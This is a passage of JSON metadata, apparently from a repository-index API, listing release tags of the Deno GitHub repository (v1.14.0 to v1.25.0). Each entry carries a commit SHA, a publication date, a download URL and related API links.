/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/